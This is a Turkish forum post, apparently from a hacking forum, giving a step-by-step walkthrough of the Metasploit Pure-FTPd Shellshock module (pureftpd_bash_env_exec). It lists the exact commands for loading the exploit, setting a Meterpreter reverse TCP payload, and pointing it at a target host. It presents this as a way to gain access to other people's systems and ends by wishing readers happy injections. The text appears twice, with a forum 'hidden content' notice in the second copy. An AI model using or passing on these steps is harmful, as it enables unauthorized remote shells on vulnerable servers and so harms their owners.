Selam Kızlar .?.?.?.?
Konuda size "PureFTP" exploitinin metasploit kullanımını anlatacağım
Bu exploit sayesinde hedef sisteme kendi payloadımızı enjekte edebiliriz ve sisteme erişim sağlayabiliriz.
Başlıyorum;
Öncelikle metasploiti açalım ve exploite geçiş yapalım;
use exploit/multi/ftp/pureftpd_bash_env_exec
Komutunu giriyoruz. Gördüğünüz gibi şuan exploitdeyiz. Şimdide hedef sistem için bir reverse shell (payloadımızı) belirleyelim ve sonucunda bu payloadımızı hedef sisteme enjekte edelim;
set payload linux/x86/meterpreter/reverse_tcp
Komutunu giriyoruz. Artık Exploitimiz ve payloadımız hazır. Şimdi gerekli ayarları yapalım;
set RHOST hedefsistemip
set LHOST kendilocalipiniz
Olarak giriyoruz komutları.
Exploit 2014 Tarihlidir, bu tarihe kadar çıkan tüm sürümleri parçalar.
İyi Enjeksiyonlar..
Konuda size "PureFTP" exploitinin metasploit kullanımını anlatacağım
Bu exploit sayesinde hedef sisteme kendi payloadımızı enjekte edebiliriz ve sisteme erişim sağlayabiliriz.
Başlıyorum;
View hidden content is available for registered users!
Öncelikle metasploiti açalım ve exploite geçiş yapalım;
use exploit/multi/ftp/pureftpd_bash_env_exec
Komutunu giriyoruz. Gördüğünüz gibi şuan exploitdeyiz. Şimdide hedef sistem için bir reverse shell (payloadımızı) belirleyelim ve sonucunda bu payloadımızı hedef sisteme enjekte edelim;
set payload linux/x86/meterpreter/reverse_tcp
Komutunu giriyoruz. Artık Exploitimiz ve payloadımız hazır. Şimdi gerekli ayarları yapalım;
set RHOST hedefsistemip
set LHOST kendilocalipiniz
Olarak giriyoruz komutları.
Exploit 2014 Tarihlidir, bu tarihe kadar çıkan tüm sürümleri parçalar.
İyi Enjeksiyonlar..